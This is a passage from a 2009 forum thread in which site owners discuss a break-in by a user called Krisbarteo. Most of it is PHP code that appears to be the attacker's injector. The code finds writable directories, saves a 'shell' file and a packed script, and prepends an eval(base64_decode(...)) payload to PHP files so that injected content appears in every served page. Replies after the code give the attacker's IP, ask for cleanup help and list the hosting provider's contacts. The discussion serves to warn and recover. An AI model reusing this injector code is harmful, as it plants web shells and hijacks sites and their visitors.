if(!replace_substring($pms, '$GLOBALS[\'dgfxp\'] = "', '";', $path.$GLOBALS['dgfn'])){
echo"<b style=\"color:red\">failed to set path to fix file</b><br>[9477124]";
}else{
echo"<b style=\"color:green\">path to the file for fix successfully set [{$path}{$GLOBALS['dgfn']}]</b><br>[5018843]<br>";
}
break;
}
}
if(!$f){
echo"<b style=\"color:red\">failed to find path to fix file</b><br>[5488349]";
}
*/
$packed_js = prepare_pack($pms);
//$packed_js = $pms;
$my_size = strval(strlen($packed_js));
while(strlen($my_size) < 7){$my_size = '0' . $my_size;}
if(!replace_substring($pms, '"00'.'0', '";', $my_size)){
die("<b style=\"color:red\">failed to set size</b><br>[86612935]");
}
//$packed_js = $pms;
$packed_js = prepare_pack($pms);
echo"<br>my packed size: $my_size<br>";

save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgin'], $packed_js, "<b style=\"color:green\">main script path [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[48839]<br>", 1, $silent);
save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgsf'], $shl, "<b style=\"color:green\">shell path [{$GLOBALS['dgcp']}{$GLOBALS['dgsf']}]</b><br>[58392]<br>", 1);
/*
if($GLOBALS['dbg']){
save_text_to_file($GLOBALS['fpath'].$GLOBALS['dgsf'], $shl, "<b style=\"color:green\">!!!!!!!!! test shell path [{$GLOBALS['fpath']}{$GLOBALS['dgsf']}] !!!!!!!!!!</b><br>", 1);
}
*/

function dgrself($path, $silent = true){
global $_GET;
if(!$silent){
echo "restoring functions.php at path [{$path}]<br>";flush();
}
$pf = implode("", file($path));
if($pf){
if(!$silent){
echo"{$path} loaded successfully<hr>";
}
}else{
if(!$silent){
echo"failed to load {$path}<br>[8856284]";
}
}
$pf = '';
$arr = file($path);
foreach($arr as $key=>$val){
if(strpos($val, 'eval(base64_decode') === false){
$pf .= $val;
}
}
save_text_to_file($path, $pf, "file {$path} successfully RESTORED<br>[88293764]<br>", 1, $silent);
}

function fddir($ff, &$madrs, &$flag){
global $_GET;
//if($flag || count($madrs) > 300){
if($flag){
return;
}
$php_found = "";
$writable = 0;
//$folder = realpath($ff);
$folder = $ff;
$folder = str_replace('\\', '/', $folder);
if(substr($folder, strlen($folder) - 1, 1) <> '/'){
$folder .= '/';
}
if(!file_exists($folder)){
echo"<font color='red'>{$folder} not exists</font><br>";
return;
}
if(!is_dir($folder)){
echo"<font color='red'>{$folder} is not dir</font><br>";
return;
}
$dir_perm = substr(sprintf('%o', fileperms($folder)), -4);
$new_dir_perm = substr(sprintf('%o', fileperms($folder)), -4);
if($new_dir_perm <> $dir_perm){
$new_dir_perm = "$dir_perm >> $new_dir_perm";
}
$succ = false;
$rndfl = rand(1,9999999999).'.php';
$f = fopen($folder.$rndfl, "w");
if(!$f){
if(isset($_GET['details'])){
echo"<font color=red>[{$new_dir_perm}] {$folder}</font><br>";flush();
}
}else{
if(isset($_GET['details'])){
echo"<font color=green>[{$new_dir_perm}] {$folder}</font><br>";flush();
}
fclose($f);
if(!unlink($folder.$rndfl)){
if(isset($_GET['details'])){
echo"<font color='red'>{$folder}{$rndfl} failed to delete</font><br>";
}
unset($madrs[$folder]);
}
$writable = 1;
}
if($GLOBALS['rewrite_old'] && $writable && file_exists($folder.$GLOBALS['dgin'])){
echo"<b style=\"color:green\">old js [{$folder}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";
if(file_exists($folder.'cnf')){
$ct = implode('', file($folder.'cnf'));
$ct = preg_replace("/ZGd1aA\=\=.*\n/", '', $ct);
save_text_to_file($folder.'cnf', $ct, "<br>config file updated<br>", 1);
//unlink($folder.'cnf');
}
$flag = true;
$madrs = array();
$madrs[$folder] = 1;
return;
}
$h = opendir($folder);
if(!$h){
if(isset($_GET['details'])){
echo"<font color='red'>$folder opendir failed</font><br>";
}
return;
}
while(strlen($f = readdir($h))){
if($f == '.' || $f == '..' || $f == '/' || $f == '\\'){
continue;
}
if(is_dir($folder.$f)){
fddir($folder.$f.'/', $madrs, $flag);
}elseif(is_file($folder.$f) && in_array(strtolower(gfe($folder.$f)), array("php","phtml","php3"))){
$php_found = $folder.$f;
}
}
closedir($h);
if($writable/* && $php_found*/){
$madrs[$folder] = 1;
}
}

$str = "if(function_exists('ob_start')&&!isset(\$GLOBALS['sh_no'])){\$GLOBALS['sh_no']=1;if(file_exists('{$GLOBALS['dgcp']}{$GLOBALS['dgin']}')){include_once('{$GLOBALS['dgcp']}{$GLOBALS['dgin']}');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode(\$d){\$f=ord(substr(\$d,3,1));\$h=10;\$e=0;if(\$f&4){\$e=unpack('v',substr(\$d,10,2));\$e=\$e[1];\$h+=2+\$e;}if(\$f&8){\$h=strpos(\$d,chr(0),\$h)+1;}if(\$f&16){\$h=strpos(\$d,chr(0),\$h)+1;}if(\$f&2){\$h+=2;}\$u=gzinflate(substr(\$d,\$h));if(\$u===FALSE){\$u=\$d;}return \$u;}}function dgobh(\$b){Header('Content-Encoding: none');\$c=gzdecode(\$b);if(preg_match('/\<body/si',\$c)){return preg_replace('/(\<body[^\>]*\>)/si','\$1'.gml(),\$c);}else{return gml().\$c;}}ob_start('dgobh');}}}";

$str = "<?php /**/eval(base64_decode('" . base64_encode($str) . "')); ?>";
echo"<small>";
echo"<h3>INJECTING PHP FILES</h3>";
$GLOBALS['dgdirs'] = array();
$GLOBALS['dgfiles'] = array();

echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush();
phpinj($GLOBALS['dgsp'], $str, 1, 0);

$tmp = explode("/", $GLOBALS['fpath']);
$path = '';
$c = 0;
foreach($tmp as $key=>$val){
if(!$val && $c){
continue;
}
$c++;
$path .= $val . "/";
if(strlen($GLOBALS['dgsp']) > strlen($path)){
continue;
}
echo"<h4>GOTO: $path</h4>";
phpinj($path, $str, 1, 0);
}

die("</small><hr><b>dgok</b></div>");


Quote from: hobox on May 05, 2009, 07:29:24 PM
Krisbarteo had done the same to my forum. An avatar 1,82KB large. All my PHP files were corrupted

He came from 94.142.129.147

Yeah that was the IP that he had when he paid my forum a visit too.


Very informative post, thanx all.

I am running 1.1.8, and after having problems with user Avatars displaying, it didn't take long to be led to this post identifying "Krisbarteo" which i found was a user on my site.

I have banned/deleted the account, however many of my member avatars are still not working. So i am assuming, my site must still be affected by that accounts attack. Yet, I looked through my PHP files and did not find any of the above listed code embedded in them.

Can someone offer any guidance as to where i should be looking so that I can attempt to remove them? Or could i have not been attached (even though he was a member) and my avatar problem caused by something else? Although i find it unlikely becuase the problems did begin shortly after he was a member.

Thanx.


cowdude

You guys are big help and I appreciate all you are doing.

I want to ask a very specific question.  Once everything is clean, which I have done 3 or 4 times and I did just KRISBARTEO, it has popped back up.  My question are:

1.  Is the code the "64 Base" crap with a long "string of number" behind it or is that the result of the code that I have missed so far?

2.  Is the code only appearing in .php files or should I be scouring others as well, i.e. htaccess files?

Thanks again.

Cowdude
Left or right meet me at THE WATER COOLER to discuss your political views.

DirtRider

Anyone thought of contacting the ISP at all  :D

"CSS GROUP" Ltd.
Caunas street 7A-26, Cesis, LV-4101

Phone: +371 67 404544
Fax: +371 67 414545

E-mail addresses

Common questions:

Technical support:

Financial department:

Device rent and colocation:

SPAM report:    [email protected]

[email protected]

[email protected]

[email protected]

[email protected]
http://www.triumphtalk.com

"The real question is not whether machines think but whether men do. "

Advertisement: